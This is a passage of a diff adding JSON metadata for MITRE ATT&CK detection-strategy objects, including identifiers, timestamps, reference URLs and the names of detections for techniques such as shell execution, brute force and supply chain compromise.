+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.690000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--4a89bf52-7be1-405d-8d02-462e52553bc5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.676000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0384",
+                            "external_id": "DET0384"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection of Unix Shell Execution",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--c5556dd5-005a-4c11-b028-240fa379d827",
+                        "x-mitre-analytic--ebd61e14-852c-403b-8b50-7e15a1c32d05",
+                        "x-mitre-analytic--52f4a572-0d43-4684-9598-6bc8cf2bffb1",
+                        "x-mitre-analytic--2adf0c92-5d0a-459d-affc-f4abd4d406d0"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.676000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--050d236f-745a-4801-add6-50cb58248615",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.667000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0093",
+                            "external_id": "DET0093"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection of User Discovery via Local and Remote Enumeration",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--5d024a50-97d8-4b81-8cc6-3db4fff2712c",
+                        "x-mitre-analytic--73b31f73-bc47-45c1-9c02-fd8eaacb2f9b",
+                        "x-mitre-analytic--0979e7f1-9d0a-4549-be8f-88979df5c8d7",
+                        "x-mitre-analytic--a5cc0eac-af18-4fe2-ac06-88a5cfddf014"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.667000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--4a7f1bc4-4396-49e1-9c75-caa6ecd64047",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.676000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0076",
+                            "external_id": "DET0076"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection of Visual Basic Execution (VBS/VBA/VBScript)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--0fe7a1db-759d-4d27-8ef1-a71509643594",
+                        "x-mitre-analytic--668bc76f-04cc-4274-8a66-cfa00e83ef14",
+                        "x-mitre-analytic--08318de4-1327-48ac-a686-403162d3891f"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.676000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--baea10fc-7921-4ae2-bfe6-572c3f107303",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.690000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0464",
+                            "external_id": "DET0464"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection of Wi-Fi Discovery Activity",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--8d58973f-7fd7-435e-86b8-58f9b399f89f",
+                        "x-mitre-analytic--1f3a6d61-9658-4c9b-92af-5c711206e3fa",
+                        "x-mitre-analytic--ce2233bb-9715-4e7b-8603-7218f8bae326"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.690000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--7ff1f384-2373-4ea9-9311-1587b520a5c4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.683000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0477",
+                            "external_id": "DET0477"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection of WinRM-Based Remote Access",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--9dab17bf-62c7-4187-90f4-7335790df7c0"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.683000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--1806ad13-6fa8-4cb0-9d91-c8a989a1d9fe",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.671000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0202",
+                            "external_id": "DET0202"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection of Windows Command Shell Execution",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--60d70569-0d28-4d98-957c-4676b2411685"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.671000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--18c9199f-d6b6-4efe-ac90-9a1b7b8c6f36",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.671000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0537",
+                            "external_id": "DET0537"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral detection for Supply Chain Compromise (package/update tamper \u2192 install \u2192 first-run)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--a6b1e74e-6c05-4d9f-928c-63ddf558798b",
+                        "x-mitre-analytic--86f2dfd5-7073-4178-8c83-8628ecf087d4",
+                        "x-mitre-analytic--779b2e27-9318-46a3-aeec-765f5fb09de3"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.671000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--d9cf8032-7b53-4251-8519-a7ccbf6a027a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.694000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0498",
+                            "external_id": "DET0498"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavior\u2011chain detection for T1134.003 Make and Impersonate Token (Windows)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--6eab700a-548f-48aa-8821-163682fe8bbe"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.694000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--a9796458-df5d-467f-b037-acad6c261f25",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.687000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0274",
+                            "external_id": "DET0274"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Boot or Logon Autostart Execution Detection Strategy",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--aa12f037-f724-43a6-97ca-e2e706859c1a",
+                        "x-mitre-analytic--156387d6-9b9a-49f8-834a-cf3cd5ede09c",
+                        "x-mitre-analytic--eb0d78b0-f35d-49db-a8a5-d3cf840db6fd"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.687000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--6928b108-f04e-4a9b-bda5-53bb0c64ec9b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.680000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0112",
+                            "external_id": "DET0112"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Boot or Logon Initialization Scripts Detection Strategy",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--682bd971-c540-4c16-a25a-b928201a320d",
+                        "x-mitre-analytic--0f8a0af6-7544-4f29-8e08-6b07dda1337e",
+                        "x-mitre-analytic--3b218f49-59ce-44a5-a10b-889c99e78934",
+                        "x-mitre-analytic--32199f21-430f-4c91-b2d7-a0b7409cd5f0",
+                        "x-mitre-analytic--416b5616-a16d-4ccc-b214-5873f96e5b1f"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.680000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--1439efe8-4d10-4ce8-8727-458db69bae85",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.670000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0463",
+                            "external_id": "DET0463"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Brute Force Authentication Failures with Multi-Platform Log Correlation",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--db50537c-9234-4350-9bf0-838d4cffbd34",
+                        "x-mitre-analytic--cba73580-034b-4cdd-84a2-22704d520e9c",
+                        "x-mitre-analytic--72bf9819-b0b5-43ab-9c2d-195abe8165b8",
+                        "x-mitre-analytic--b31fc018-6fbc-4de7-9bf2-f545b5f8f0c2",
+                        "x-mitre-analytic--a1436a64-ffc4-4e39-a7c8-140e78336ffa"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.670000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--461e3a2b-2315-4550-abb4-0bd73b0ceaa6",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.676000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0341",
+                            "external_id": "DET0341"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Clipboard Data Access with Anomalous Context",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--48e4aceb-38dd-4bf2-8074-9fee8436985b",
+                        "x-mitre-analytic--38252d77-0b46-4e00-8732-3ce1f8491472",
+                        "x-mitre-analytic--ab9a4c72-f7ce-4721-8c9f-c5d9c966b600"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.676000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--880c0a88-bbd5-4d71-b8bd-72fbab7d58b2",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.684000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0386",
+                            "external_id": "DET0386"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Cloud Account Enumeration via API, CLI, and Scripting Interfaces",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--f74ce996-0982-4e2a-86ee-5bce001ee9fc",
+                        "x-mitre-analytic--3d124174-1e58-44e2-9f5b-f63394fb7a2e",
+                        "x-mitre-analytic--0961ff0c-8c36-4820-948d-12855b7f5cc7",
+                        "x-mitre-analytic--089d588f-a6aa-4083-a900-ebcae97b5bfa"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.684000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--77d3b532-9c4f-4f9f-9581-3009b201435d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.681000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0309",
+                            "external_id": "DET0309"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Compromised software/update chain (installer/write \u2192 first-run/child \u2192 egress/signature anomaly)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--e3ddaba3-282b-4bd0-b316-78b724b79acd",
+                        "x-mitre-analytic--b6f88f17-e80f-4c75-99a5-f752880196aa",
+                        "x-mitre-analytic--86a87684-5fd5-4778-be36-5dfa07a4246d"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.681000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--26580351-9bc3-4e03-b5ad-139d38303707",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.672000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0083",
+                            "external_id": "DET0083"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Container CLI and API Abuse via Docker/Kubernetes (T1059.013)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--e4dd4100-2387-4029-a478-35aefd37c288"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.672000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--17c97a51-74c2-449c-bc95-cf6a7647fb83",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.671000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0446",
+                            "external_id": "DET0446"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Credential Access via /etc/passwd and /etc/shadow Parsing",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--d6166e3d-2e29-4097-9fb4-c66ce0616897"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.671000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--13c88a68-15e3-45e5-958b-82fe7b948561",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.669000+00:00",
